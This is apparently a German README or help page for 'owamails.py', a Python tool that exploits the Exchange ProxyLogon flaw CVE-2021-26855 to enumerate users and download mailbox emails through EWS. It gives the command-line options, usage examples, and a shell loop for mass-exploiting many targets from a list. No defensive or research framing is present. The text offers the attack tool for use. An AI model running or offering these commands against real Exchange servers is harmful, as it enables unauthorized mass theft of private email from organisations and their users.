
Python-Tool zur Ausnutzung von CVE-2021-26855 (ProxyLogon) zum Herunterladen von Exchange-Postfach-E-Mails über EWS, mit Unterstützung für Benutzerenumeration und Massenziel-Scans.
Grundlegende Verwendung: python owamails.py -u <url> -l <users.txt> -p <path>
optionale Argumente:
-h, --help zeigt diese Hilfemeldung an und beendet das Programm
-u URL, --url URL URL, Schema angeben und kein abschließendes / (z.B. https://example.org)
-l LIST, --list LIST Benutzer-Mailboxliste
-p PATH, --path PATH Pfad zum Speichern der E-Mails im XML-Format
-f FQDN, --fqdn FQDN FQDN
-d DOMAIN, --domain DOMAIN
Domäne zur Überprüfung der Mailboxen (z.B. wenn .local nicht funktioniert)
E-Mail-Postfächer überprüfen und E-Mails herunterladen
einfach:
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads
Domäne nicht aus Headern ermitteln:
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -d mydomain.local
FQDN nicht aus Headern ermitteln:
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -f EXCH01
Massenabfrage?:
for i in $(cat targets.txt); do echo $i && python3 owamails.py -u https://$i -l users.txt -p emails; done;
Referenzen:
Fork von:
https://gitlab.com/gvillegas/ohwaa/